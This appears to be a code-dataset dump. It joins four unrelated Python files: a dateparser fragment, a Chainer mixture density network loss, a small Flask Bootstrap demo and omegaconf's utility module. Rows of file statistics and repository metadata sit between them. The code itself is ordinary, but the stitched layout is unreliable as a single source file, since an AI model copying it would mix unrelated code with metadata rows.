date_string = sanitize_date(date_string)
for language in self.language_detector.iterate_applicable_languages(
date_string, modify=True, settings=self._settings):
parsed_date = _DateLanguageParser.parse(
language, date_string, date_formats, settings=self._settings)
if parsed_date:
parsed_date['language'] = language.shortname
return parsed_date
else:
return {'date_obj': None, 'period': 'day', 'language': None}
def get_date_tuple(self, *args, **kwargs):
date_tuple = collections.namedtuple('DateData', 'date_obj period language')
date_data = self.get_date_data(*args, **kwargs)
return date_tuple(**date_data)
@classmethod
def _get_language_loader(cls):
if not cls.language_loader:
cls.language_loader = LanguageDataLoader()
return cls.language_loader
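# Illustrative usage (a sketch; actual results depend on the current date and settings):
#
#   parser = DateDataParser(languages=['en'])
#   parser.get_date_data(u'March 2015')    # {'date_obj': datetime(2015, 3, <today>), 'period': u'month', 'language': 'en'}
#   parser.get_date_tuple(u'March 2015')   # the same data as a DateData namedtuple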
| 38.338384
| 114
| 0.640364
| 1,876
| 15,182
| 4.943497
| 0.188699
| 0.030947
| 0.024154
| 0.015096
| 0.26019
| 0.177054
| 0.104593
| 0.035799
| 0.025232
| 0.025232
| 0
| 0.012166
| 0.258266
| 15,182
| 395
| 115
| 38.435443
| 0.811384
| 0.194177
| 0
| 0.15444
| 0
| 0.003861
| 0.083747
| 0.008408
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084942
| false
| 0
| 0.050193
| 0.011583
| 0.266409
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
1347a75f9a9bad0cfccf1c5a976700bd26f857d2
| 8,817
|
py
|
Python
|
src/models/functions/connection/mixture_density_network.py
|
kristofbc/handwriting-synthesis
|
16505e89fd7275d4cd3ed9c4388c9f3c153a0397
|
[
"FTL"
] | null | null | null |
src/models/functions/connection/mixture_density_network.py
|
kristofbc/handwriting-synthesis
|
16505e89fd7275d4cd3ed9c4388c9f3c153a0397
|
[
"FTL"
] | null | null | null |
src/models/functions/connection/mixture_density_network.py
|
kristofbc/handwriting-synthesis
|
16505e89fd7275d4cd3ed9c4388c9f3c153a0397
|
[
"FTL"
] | null | null | null |
import chainer
import chainer.functions
from chainer.utils import type_check
from chainer import cuda
from chainer import function
import numpy as np
#from chainer import function_node
from utils import clip_grad
#class MixtureDensityNetworkFunction(function_node.FunctionNode):
class MixtureDensityNetworkFunction(function.Function):
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 8)
x_type, eos_input_type, pi_input_type, mu_x1_input_type, mu_x2_input_type, s_x1_input_type, s_x2_input_type, rho_input_type = in_types
type_check.expect(
x_type.dtype.kind == 'f',
eos_input_type.dtype.kind == 'f',
pi_input_type.dtype.kind == 'f',
mu_x1_input_type.dtype.kind == 'f',
mu_x2_input_type.dtype.kind == 'f',
s_x1_input_type.dtype.kind == 'f',
s_x2_input_type.dtype.kind == 'f',
rho_input_type.dtype.kind == 'f',
x_type.ndim >= 2,
eos_input_type.ndim >= 2,
x_type.shape[0] == eos_input_type.shape[0],
x_type.shape[0] == pi_input_type.shape[0],
x_type.shape[0] == mu_x1_input_type.shape[0],
x_type.shape[0] == mu_x2_input_type.shape[0],
x_type.shape[0] == s_x1_input_type.shape[0],
x_type.shape[0] == s_x2_input_type.shape[0],
x_type.shape[0] == rho_input_type.shape[0],
pi_input_type.shape[1] == mu_x1_input_type.shape[1],
mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1],
mu_x2_input_type.shape[1] == s_x1_input_type.shape[1],
s_x1_input_type.shape[1] == s_x2_input_type.shape[1],
s_x2_input_type.shape[1] == rho_input_type.shape[1]
)
pass
def forward(self, inputs):
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
#self.retain_inputs(range(len(inputs))) # Retain everything for backward
if not type_check.same_types(*inputs):
raise ValueError("numpy and cupy must not be used together\n"
"type(x): {0}, type(eos_input): {1}, type(pi_input): {2}"
"type(mu_x1_input): {3}, type(mu_x2_input): {4}, type(s_x1_input): {5}"
"type(s_x2_input): {6}, type(rho_input): {7}"
.format(type(x), type(eos_input), type(pi_input),
type(mu_x1_input), type(mu_x2_input), type(s_x1_input),
type(s_x2_input), type(rho_input)))
xp = cuda.get_array_module(*inputs)
def softmax(x):
shiftx = x - x.max()
exps = xp.exp(shiftx)
return exps / xp.sum(exps, 1, keepdims=True)
# Get MDN coeff. Eq #18 to #22
        z_eos = 1. / (1. + xp.exp(eos_input))  # equals F.sigmoid(-eos_input); the usual sigmoid is 1/(1+e^-x), here the input's sign is flipped
z_s_x1 = xp.exp(s_x1_input) + 1e-10
z_s_x2 = xp.exp(s_x2_input) + 1e-10
z_rho = xp.tanh(rho_input)
z_pi = softmax(pi_input)
#z_pi = xp.exp(pi_input)
#z_pi = z_pi / xp.sum(z_pi, 1, keepdims=True)
z_mu_x1 = mu_x1_input
z_mu_x2 = mu_x2_input
# The MDN coeff are saved, because they're reused in the backward phase
self.z_eos = z_eos
self.z_s_x1 = z_s_x1
self.z_s_x2 = z_s_x2
self.z_rho = z_rho
self.z_pi = z_pi
self.z_mu_x1 = z_mu_x1
self.z_mu_x2 = z_mu_x2
# Compute the loss.
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
# Z variable. Eq. 25
norm_x1 = x1 - z_mu_x1
norm_x2 = x2 - z_mu_x2
z_left = (xp.square(norm_x1)/xp.square(z_s_x1)) + (xp.square(norm_x2)/xp.square(z_s_x2))
z_right = (2.*z_rho*norm_x1*norm_x2)/(z_s_x1*z_s_x2)
z = z_left - z_right
self.z = z
# Normal function. Eq. 24.
inv_ro = 1. - xp.square(z_rho) + 1e-10
n_left = 2. * np.pi * z_s_x1 * z_s_x2 * xp.sqrt(inv_ro) + 1e-10 # + 1e-10 for computational stability
n_right = xp.exp(-z / (2. * inv_ro))
n = n_right / n_left
# Gamma parameter (for the backward phase). Eq. 28-29
gamma = z_pi * n
gamma = gamma / (xp.sum(gamma, 1, keepdims=True) + 1e-10) # sum + 1e-10 for computational stability, != nan!
self.gamma = gamma
# Sequence loss. Eq. 26
loss_y = z_pi * n
loss_y = xp.sum(loss_y, 1, keepdims=True) + 1e-10 # + 1e-10 for computational stability, != nan
#epsilon = xp.full(loss_y.shape, 1e-10, dtype=xp.float32)
#loss_y = xp.maximum(loss_y, epsilon) # Because at the begining loss_y is exactly 0 sometime
loss_y = -xp.log(loss_y + 1e-10)
#loss_x = z_eos * x3 + (1. - z_eos) * (1. - x3)
#loss_x = -xp.log(loss_x)
loss_x = -x3 * xp.log(z_eos + 1e-10) - (1. - x3) * xp.log(1. - z_eos + 1e-10)
loss = loss_y + loss_x
# Mask guard to check if x3 == 2 (added padding)
idx_mask = xp.where(x3==2)[0]
mask = xp.ones_like(x3)
mask[idx_mask, 0] = 0.
self.mask = mask
loss *= mask
return loss, x, z_eos, z_pi, z_mu_x1, z_mu_x2, z_s_x1, z_s_x2, z_rho,
def backward(self, inputs, grad_outputs):
xp = cuda.get_array_module(*inputs)
#x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = self.get_retained_inputs()
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
# MDN coeff to differentiate
g_eos = xp.empty_like(eos_input)
g_s_x1 = xp.empty_like(s_x1_input)
g_s_x2 = xp.empty_like(s_x2_input)
g_rho = xp.empty_like(rho_input)
g_pi = xp.empty_like(pi_input)
g_mu_x1 = xp.empty_like(mu_x1_input)
g_mu_x2 = xp.empty_like(mu_x2_input)
# Compute the gradient
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
#if xp == np:
# From eq. 27 to 37
C = 1. / (1. - self.z_rho*self.z_rho + 1e-10)
d_norm_x1 = (x1 - self.z_mu_x1) / self.z_s_x1
d_norm_x2 = (x2 - self.z_mu_x2) / self.z_s_x2
d_rho_norm_x1 = self.z_rho * d_norm_x1
d_rho_norm_x2 = self.z_rho * d_norm_x2
g_eos = (x3 - self.z_eos) * self.mask
g_pi = (self.z_pi - self.gamma) * self.mask
g_mu_x1 = - self.gamma * ((C/self.z_s_x1) * (d_norm_x1 - d_rho_norm_x2)) * self.mask
g_mu_x2 = - self.gamma * ((C/self.z_s_x2) * (d_norm_x2 - d_rho_norm_x1)) * self.mask
g_s_x1 = - self.gamma * ((C*d_norm_x1) * (d_norm_x1 - d_rho_norm_x2) - 1.) * self.mask
g_s_x2 = - self.gamma * ((C*d_norm_x2) * (d_norm_x2 - d_rho_norm_x1) - 1.) * self.mask
g_rho = - self.gamma * (d_norm_x1*d_norm_x2 + self.z_rho*(1. - C * self.z)) * self.mask
#else:
# g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho = cuda.elementwise(
# 'T x1, T x2, T eos_input, T pi_input, T mu_x1_input, T mu_x2_input, T s_x1_input, T s_x2_input, T rho_input',
# 'T g_eos, T g_pi, T g_mu_x1, T g_mu_x2, T g_s_x1, T g_s_x2, T g_rho',
# )
        # Add gradient clipping here if the gradients explode (p. 23 of the paper)
th_min = -100.0
th_max = 100.0
g_eos = clip_grad(g_eos, th_min, th_max, xp)
g_pi = clip_grad(g_pi, th_min, th_max, xp)
g_mu_x1 = clip_grad(g_mu_x1, th_min, th_max, xp)
g_mu_x2 = clip_grad(g_mu_x2, th_min, th_max, xp)
g_s_x1 = clip_grad(g_s_x1, th_min, th_max, xp)
g_s_x2 = clip_grad(g_s_x2, th_min, th_max, xp)
g_rho = clip_grad(g_rho, th_min, th_max, xp)
return None, g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho,
def mixture_density_network(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho):
""" Mixture Density Network
Output the coefficient params
Args:
x (Variable): Tensor containing the position [x1, x2, x3] to predict
eos (Variable): End-of-stroke prediction
pi (Variable): mixture components
mu_x1 (Variable): mean of x1
mu_x2 (Variable): mean of x2
s_x1 (Variable): variance of x1
s_x2 (Variable): variance of x2
rho (Variable): correlation parameter
Returns:
loss (Variable)
y (Variable)
eos (Variable)
pi (Variable)
mu_x1 (Variable)
mu_x2 (Variable)
s_x1 (Variable)
s_x2 (Variable)
rho (Variable)
"""
return MixtureDensityNetworkFunction()(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho)
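# Illustrative call (a sketch only; shapes are inferred from check_type_forward above,
# where x holds [x1, x2, eos-flag] per point and the mixture has M components):
#
#   batch, M = 32, 20
#   x   = chainer.Variable(np.zeros((batch, 3), dtype=np.float32))
#   eos = chainer.Variable(np.zeros((batch, 1), dtype=np.float32))
#   pi, mu_x1, mu_x2, s_x1, s_x2, rho = (
#       chainer.Variable(np.zeros((batch, M), dtype=np.float32)) for _ in range(6))
#   outputs = mixture_density_network(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho)
#   loss = outputs[0]                     # remaining outputs are the MDN coefficients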
| 40.260274
| 142
| 0.576613
| 1,480
| 8,817
| 3.098649
| 0.128378
| 0.074575
| 0.051897
| 0.032708
| 0.35543
| 0.305495
| 0.245312
| 0.210641
| 0.178151
| 0.146751
| 0
| 0.052769
| 0.303618
| 8,817
| 218
| 143
| 40.444954
| 0.694137
| 0.229103
| 0
| 0.077519
| 0
| 0.015504
| 0.032969
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03876
| false
| 0.007752
| 0.054264
| 0
| 0.131783
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
134809d310a2c2bc00124d8b1a5104d5d2cb92b6
| 939
|
py
|
Python
|
flask__webservers/bootstrap_4__toggle_switch__examples/main.py
|
DazEB2/SimplePyScripts
|
1dde0a42ba93fe89609855d6db8af1c63b1ab7cc
|
[
"CC-BY-4.0"
] | null | null | null |
flask__webservers/bootstrap_4__toggle_switch__examples/main.py
|
DazEB2/SimplePyScripts
|
1dde0a42ba93fe89609855d6db8af1c63b1ab7cc
|
[
"CC-BY-4.0"
] | null | null | null |
flask__webservers/bootstrap_4__toggle_switch__examples/main.py
|
DazEB2/SimplePyScripts
|
1dde0a42ba93fe89609855d6db8af1c63b1ab7cc
|
[
"CC-BY-4.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# SOURCE: https://github.com/twbs/bootstrap
# SOURCE: https://github.com/gitbrent/bootstrap4-toggle
# SOURCE: https://gitbrent.github.io/bootstrap4-toggle/
from flask import Flask, render_template
app = Flask(__name__)
import logging
logging.basicConfig(level=logging.DEBUG)
@app.route("/")
def index():
return render_template('index.html')
if __name__ == '__main__':
app.debug = True
# Localhost
# port=0 -- random free port
# app.run(port=0)
app.run(
port=5000,
# :param threaded: should the process handle each request in a separate
# thread?
# :param processes: if greater than 1 then handle each request in a new process
# up to this maximum number of concurrent processes.
threaded=True,
)
# # Public IP
# app.run(host='0.0.0.0')
| 22.357143
| 87
| 0.631523
| 119
| 939
| 4.831933
| 0.613445
| 0.057391
| 0.05913
| 0.069565
| 0.069565
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021216
| 0.247071
| 939
| 41
| 88
| 22.902439
| 0.792079
| 0.556976
| 0
| 0
| 0
| 0
| 0.067332
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.142857
| 0.071429
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13495c72390c53605e37531f81078eacc3f25cd2
| 30,078
|
py
|
Python
|
omegaconf/_utils.py
|
sugatoray/omegaconf
|
edf9e86493a14b0e909e956d9bae59b9861ef9c5
|
[
"BSD-3-Clause"
] | 1,091
|
2018-09-06T17:27:12.000Z
|
2022-03-31T13:47:45.000Z
|
omegaconf/_utils.py
|
sugatoray/omegaconf
|
edf9e86493a14b0e909e956d9bae59b9861ef9c5
|
[
"BSD-3-Clause"
] | 624
|
2019-06-11T20:53:19.000Z
|
2022-03-30T20:44:25.000Z
|
omegaconf/_utils.py
|
sugatoray/omegaconf
|
edf9e86493a14b0e909e956d9bae59b9861ef9c5
|
[
"BSD-3-Clause"
] | 71
|
2019-06-14T05:32:45.000Z
|
2022-03-27T19:52:35.000Z
|
import copy
import os
import re
import string
import sys
import warnings
from contextlib import contextmanager
from enum import Enum
from textwrap import dedent
from typing import (
Any,
Dict,
Iterator,
List,
Optional,
Tuple,
Type,
Union,
get_type_hints,
)
import yaml
from .errors import (
ConfigIndexError,
ConfigTypeError,
ConfigValueError,
GrammarParseError,
OmegaConfBaseException,
ValidationError,
)
from .grammar_parser import SIMPLE_INTERPOLATION_PATTERN, parse
try:
import dataclasses
except ImportError: # pragma: no cover
dataclasses = None # type: ignore # pragma: no cover
try:
import attr
except ImportError: # pragma: no cover
attr = None # type: ignore # pragma: no cover
# Regexprs to match key paths like: a.b, a[b], ..a[c].d, etc.
# We begin by matching the head (in these examples: a, a, ..a).
# This can be read as "dots followed by any character but `.` or `[`"
# Note that a key starting with brackets, like [a], is purposely *not*
# matched here and will instead be handled in the next regex below (this
# is to keep this regex simple).
KEY_PATH_HEAD = re.compile(r"(\.)*[^.[]*")
# Then we match other keys. The following expression matches one key and can
# be read as a choice between two syntaxes:
# - `.` followed by anything except `.` or `[` (ex: .b, .d)
# - `[` followed by anything then `]` (ex: [b], [c])
KEY_PATH_OTHER = re.compile(r"\.([^.[]*)|\[(.*?)\]")
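# For illustration only (the library does not use them in exactly this form): splitting
# the key path "..a[c].d" with these two expressions gives
#   KEY_PATH_HEAD.match("..a[c].d").group(0)  -> "..a"
#   KEY_PATH_OTHER.findall("[c].d")           -> [("", "c"), ("d", "")]
# i.e. the head plus one tuple per remaining key, with the non-empty slot holding it.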
# source: https://yaml.org/type/bool.html
YAML_BOOL_TYPES = [
"y",
"Y",
"yes",
"Yes",
"YES",
"n",
"N",
"no",
"No",
"NO",
"true",
"True",
"TRUE",
"false",
"False",
"FALSE",
"on",
"On",
"ON",
"off",
"Off",
"OFF",
]
class Marker:
def __init__(self, desc: str):
self.desc = desc
def __repr__(self) -> str:
return self.desc
# To be used as default value when `None` is not an option.
_DEFAULT_MARKER_: Any = Marker("_DEFAULT_MARKER_")
class OmegaConfDumper(yaml.Dumper): # type: ignore
str_representer_added = False
@staticmethod
def str_representer(dumper: yaml.Dumper, data: str) -> yaml.ScalarNode:
with_quotes = yaml_is_bool(data) or is_int(data) or is_float(data)
return dumper.represent_scalar(
yaml.resolver.BaseResolver.DEFAULT_SCALAR_TAG,
data,
style=("'" if with_quotes else None),
)
def get_omega_conf_dumper() -> Type[OmegaConfDumper]:
if not OmegaConfDumper.str_representer_added:
OmegaConfDumper.add_representer(str, OmegaConfDumper.str_representer)
OmegaConfDumper.str_representer_added = True
return OmegaConfDumper
def yaml_is_bool(b: str) -> bool:
return b in YAML_BOOL_TYPES
def get_yaml_loader() -> Any:
class OmegaConfLoader(yaml.SafeLoader): # type: ignore
def construct_mapping(self, node: yaml.Node, deep: bool = False) -> Any:
keys = set()
for key_node, value_node in node.value:
if key_node.tag != yaml.resolver.BaseResolver.DEFAULT_SCALAR_TAG:
continue
if key_node.value in keys:
raise yaml.constructor.ConstructorError(
"while constructing a mapping",
node.start_mark,
f"found duplicate key {key_node.value}",
key_node.start_mark,
)
keys.add(key_node.value)
return super().construct_mapping(node, deep=deep)
loader = OmegaConfLoader
loader.add_implicit_resolver(
"tag:yaml.org,2002:float",
re.compile(
"""^(?:
[-+]?(?:[0-9][0-9_]*)\\.[0-9_]*(?:[eE][-+]?[0-9]+)?
|[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)
|\\.[0-9_]+(?:[eE][-+][0-9]+)?
|[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\\.[0-9_]*
|[-+]?\\.(?:inf|Inf|INF)
|\\.(?:nan|NaN|NAN))$""",
re.X,
),
list("-+0123456789."),
)
loader.yaml_implicit_resolvers = {
key: [
(tag, regexp)
for tag, regexp in resolvers
if tag != "tag:yaml.org,2002:timestamp"
]
for key, resolvers in loader.yaml_implicit_resolvers.items()
}
return loader
def _get_class(path: str) -> type:
from importlib import import_module
module_path, _, class_name = path.rpartition(".")
mod = import_module(module_path)
try:
klass: type = getattr(mod, class_name)
except AttributeError:
raise ImportError(f"Class {class_name} is not in module {module_path}")
return klass
def _is_union(type_: Any) -> bool:
return getattr(type_, "__origin__", None) is Union
def _resolve_optional(type_: Any) -> Tuple[bool, Any]:
"""Check whether `type_` is equivalent to `typing.Optional[T]` for some T."""
if getattr(type_, "__origin__", None) is Union:
args = type_.__args__
if len(args) == 2 and args[1] == type(None): # noqa E721
return True, args[0]
if type_ is Any:
return True, Any
return False, type_
def _is_optional(obj: Any, key: Optional[Union[int, str]] = None) -> bool:
"""Check `obj` metadata to see if the given node is optional."""
from .base import Container, Node
if key is not None:
assert isinstance(obj, Container)
obj = obj._get_node(key)
if isinstance(obj, Node):
return obj._is_optional()
else:
# In case `obj` is not a Node, treat it as optional by default.
# This is used in `ListConfig.append` and `ListConfig.insert`
# where the appended/inserted value might or might not be a Node.
return True
def _resolve_forward(type_: Type[Any], module: str) -> Type[Any]:
import typing # lgtm [py/import-and-import-from]
forward = typing.ForwardRef if hasattr(typing, "ForwardRef") else typing._ForwardRef # type: ignore
if type(type_) is forward:
return _get_class(f"{module}.{type_.__forward_arg__}")
else:
if is_dict_annotation(type_):
kt, vt = get_dict_key_value_types(type_)
if kt is not None:
kt = _resolve_forward(kt, module=module)
if vt is not None:
vt = _resolve_forward(vt, module=module)
return Dict[kt, vt] # type: ignore
if is_list_annotation(type_):
et = get_list_element_type(type_)
if et is not None:
et = _resolve_forward(et, module=module)
return List[et] # type: ignore
return type_
def extract_dict_subclass_data(obj: Any, parent: Any) -> Optional[Dict[str, Any]]:
"""Check if obj is an instance of a subclass of Dict. If so, extract the Dict keys/values."""
from omegaconf.omegaconf import _maybe_wrap
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
subclasses_dict = is_dict_subclass(obj_type)
if subclasses_dict:
warnings.warn(
f"Class `{obj_type.__name__}` subclasses `Dict`."
+ " Subclassing `Dict` in Structured Config classes is deprecated,"
+ " see github.com/omry/omegaconf/issues/663",
UserWarning,
stacklevel=9,
)
if is_type:
return None
elif subclasses_dict:
dict_subclass_data = {}
key_type, element_type = get_dict_key_value_types(obj_type)
for name, value in obj.items():
is_optional, type_ = _resolve_optional(element_type)
type_ = _resolve_forward(type_, obj.__module__)
try:
dict_subclass_data[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=parent,
)
except ValidationError as ex:
format_and_raise(
node=None, key=name, value=value, cause=ex, msg=str(ex)
)
return dict_subclass_data
else:
return None
def get_attr_class_field_names(obj: Any) -> List[str]:
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
return list(attr.fields_dict(obj_type))
def get_attr_data(obj: Any, allow_objects: Optional[bool] = None) -> Dict[str, Any]:
from omegaconf.omegaconf import OmegaConf, _maybe_wrap
flags = {"allow_objects": allow_objects} if allow_objects is not None else {}
from omegaconf import MISSING
d = {}
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
dummy_parent = OmegaConf.create({}, flags=flags)
dummy_parent._metadata.object_type = obj_type
for name, attrib in attr.fields_dict(obj_type).items():
is_optional, type_ = _resolve_optional(attrib.type)
type_ = _resolve_forward(type_, obj.__module__)
if not is_type:
value = getattr(obj, name)
else:
value = attrib.default
if value == attr.NOTHING:
value = MISSING
if _is_union(type_):
e = ConfigValueError(
f"Union types are not supported:\n{name}: {type_str(type_)}"
)
format_and_raise(node=None, key=None, value=value, cause=e, msg=str(e))
try:
d[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=dummy_parent,
)
except (ValidationError, GrammarParseError) as ex:
format_and_raise(
node=dummy_parent, key=name, value=value, cause=ex, msg=str(ex)
)
d[name]._set_parent(None)
dict_subclass_data = extract_dict_subclass_data(obj=obj, parent=dummy_parent)
if dict_subclass_data is not None:
d.update(dict_subclass_data)
return d
def get_dataclass_field_names(obj: Any) -> List[str]:
return [field.name for field in dataclasses.fields(obj)]
def get_dataclass_data(
obj: Any, allow_objects: Optional[bool] = None
) -> Dict[str, Any]:
from omegaconf.omegaconf import MISSING, OmegaConf, _maybe_wrap
flags = {"allow_objects": allow_objects} if allow_objects is not None else {}
d = {}
obj_type = get_type_of(obj)
dummy_parent = OmegaConf.create({}, flags=flags)
dummy_parent._metadata.object_type = obj_type
resolved_hints = get_type_hints(obj_type)
for field in dataclasses.fields(obj):
name = field.name
is_optional, type_ = _resolve_optional(resolved_hints[field.name])
type_ = _resolve_forward(type_, obj.__module__)
if hasattr(obj, name):
value = getattr(obj, name)
if value == dataclasses.MISSING:
value = MISSING
else:
if field.default_factory == dataclasses.MISSING: # type: ignore
value = MISSING
else:
value = field.default_factory() # type: ignore
if _is_union(type_):
e = ConfigValueError(
f"Union types are not supported:\n{name}: {type_str(type_)}"
)
format_and_raise(node=None, key=None, value=value, cause=e, msg=str(e))
try:
d[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=dummy_parent,
)
except (ValidationError, GrammarParseError) as ex:
format_and_raise(
node=dummy_parent, key=name, value=value, cause=ex, msg=str(ex)
)
d[name]._set_parent(None)
dict_subclass_data = extract_dict_subclass_data(obj=obj, parent=dummy_parent)
if dict_subclass_data is not None:
d.update(dict_subclass_data)
return d
def is_dataclass(obj: Any) -> bool:
from omegaconf.base import Node
if dataclasses is None or isinstance(obj, Node):
return False
return dataclasses.is_dataclass(obj)
def is_attr_class(obj: Any) -> bool:
from omegaconf.base import Node
if attr is None or isinstance(obj, Node):
return False
return attr.has(obj)
def is_structured_config(obj: Any) -> bool:
return is_attr_class(obj) or is_dataclass(obj)
def is_dataclass_frozen(type_: Any) -> bool:
return type_.__dataclass_params__.frozen # type: ignore
def is_attr_frozen(type_: type) -> bool:
# This is very hacky and probably fragile as well.
# Unfortunately currently there isn't an official API in attr that can detect that.
# noinspection PyProtectedMember
return type_.__setattr__ == attr._make._frozen_setattrs # type: ignore
def get_type_of(class_or_object: Any) -> Type[Any]:
type_ = class_or_object
if not isinstance(type_, type):
type_ = type(class_or_object)
assert isinstance(type_, type)
return type_
def is_structured_config_frozen(obj: Any) -> bool:
type_ = get_type_of(obj)
if is_dataclass(type_):
return is_dataclass_frozen(type_)
if is_attr_class(type_):
return is_attr_frozen(type_)
return False
def get_structured_config_field_names(obj: Any) -> List[str]:
if is_dataclass(obj):
return get_dataclass_field_names(obj)
elif is_attr_class(obj):
return get_attr_class_field_names(obj)
else:
raise ValueError(f"Unsupported type: {type(obj).__name__}")
def get_structured_config_data(
obj: Any, allow_objects: Optional[bool] = None
) -> Dict[str, Any]:
if is_dataclass(obj):
return get_dataclass_data(obj, allow_objects=allow_objects)
elif is_attr_class(obj):
return get_attr_data(obj, allow_objects=allow_objects)
else:
raise ValueError(f"Unsupported type: {type(obj).__name__}")
class ValueKind(Enum):
VALUE = 0
MANDATORY_MISSING = 1
INTERPOLATION = 2
def _is_missing_value(value: Any) -> bool:
from omegaconf import Node
if isinstance(value, Node):
value = value._value()
return _is_missing_literal(value)
def _is_missing_literal(value: Any) -> bool:
# Uses literal '???' instead of the MISSING const for performance reasons.
return isinstance(value, str) and value == "???"
def _is_none(
value: Any, resolve: bool = False, throw_on_resolution_failure: bool = True
) -> bool:
from omegaconf import Node
if not isinstance(value, Node):
return value is None
if resolve:
value = value._maybe_dereference_node(
throw_on_resolution_failure=throw_on_resolution_failure
)
if not throw_on_resolution_failure and value is None:
# Resolution failure: consider that it is *not* None.
return False
assert isinstance(value, Node)
return value._is_none()
def get_value_kind(
value: Any, strict_interpolation_validation: bool = False
) -> ValueKind:
"""
Determine the kind of a value
Examples:
VALUE: "10", "20", True
MANDATORY_MISSING: "???"
INTERPOLATION: "${foo.bar}", "${foo.${bar}}", "${foo:bar}", "[${foo}, ${bar}]",
"ftp://${host}/path", "${foo:${bar}, [true], {'baz': ${baz}}}"
:param value: Input to classify.
:param strict_interpolation_validation: If `True`, then when `value` is a string
containing "${", it is parsed to validate the interpolation syntax. If `False`,
this parsing step is skipped: this is more efficient, but will not detect errors.
"""
if _is_missing_value(value):
return ValueKind.MANDATORY_MISSING
value = _get_value(value)
# We identify potential interpolations by the presence of "${" in the string.
# Note that escaped interpolations (ex: "esc: \${bar}") are identified as
# interpolations: this is intended, since they must be processed as interpolations
# for the string to be properly un-escaped.
# Keep in mind that invalid interpolations will only be detected when
# `strict_interpolation_validation` is True.
if isinstance(value, str) and "${" in value:
if strict_interpolation_validation:
# First try the cheap regex matching that detects common interpolations.
if SIMPLE_INTERPOLATION_PATTERN.match(value) is None:
# If no match, do the more expensive grammar parsing to detect errors.
parse(value)
return ValueKind.INTERPOLATION
else:
return ValueKind.VALUE
# DEPRECATED: remove in 2.2
def is_bool(st: str) -> bool:
st = str.lower(st)
return st == "true" or st == "false"
def is_float(st: str) -> bool:
try:
float(st)
return True
except ValueError:
return False
def is_int(st: str) -> bool:
try:
int(st)
return True
except ValueError:
return False
# DEPRECATED: remove in 2.2
def decode_primitive(s: str) -> Any:
if is_bool(s):
return str.lower(s) == "true"
if is_int(s):
return int(s)
if is_float(s):
return float(s)
return s
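# Illustration (not part of the module): decode_primitive("10") -> 10,
# decode_primitive("1.5") -> 1.5, decode_primitive("TRUE") -> True,
# decode_primitive("foo") -> "foo".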
def is_primitive_list(obj: Any) -> bool:
from .base import Container
return not isinstance(obj, Container) and isinstance(obj, (list, tuple))
def is_primitive_dict(obj: Any) -> bool:
t = get_type_of(obj)
return t is dict
def is_dict_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is Dict or type_ is Dict # pragma: no cover
else: # pragma: no cover
        # TypedDict is a bit hard to detect.
        # This support is tentative; if it eventually causes issues in other areas it may be dropped.
typed_dict = hasattr(type_, "__base__") and type_.__base__ == dict
return origin is dict or typed_dict
def is_list_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is List or type_ is List # pragma: no cover
else:
return origin is list # pragma: no cover
def is_tuple_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is Tuple or type_ is Tuple # pragma: no cover
else:
return origin is tuple # pragma: no cover
def is_dict_subclass(type_: Any) -> bool:
return type_ is not None and isinstance(type_, type) and issubclass(type_, Dict)
def is_dict(obj: Any) -> bool:
return is_primitive_dict(obj) or is_dict_annotation(obj) or is_dict_subclass(obj)
def is_primitive_container(obj: Any) -> bool:
return is_primitive_list(obj) or is_primitive_dict(obj)
def get_list_element_type(ref_type: Optional[Type[Any]]) -> Any:
args = getattr(ref_type, "__args__", None)
if ref_type is not List and args is not None and args[0]:
element_type = args[0]
else:
element_type = Any
return element_type
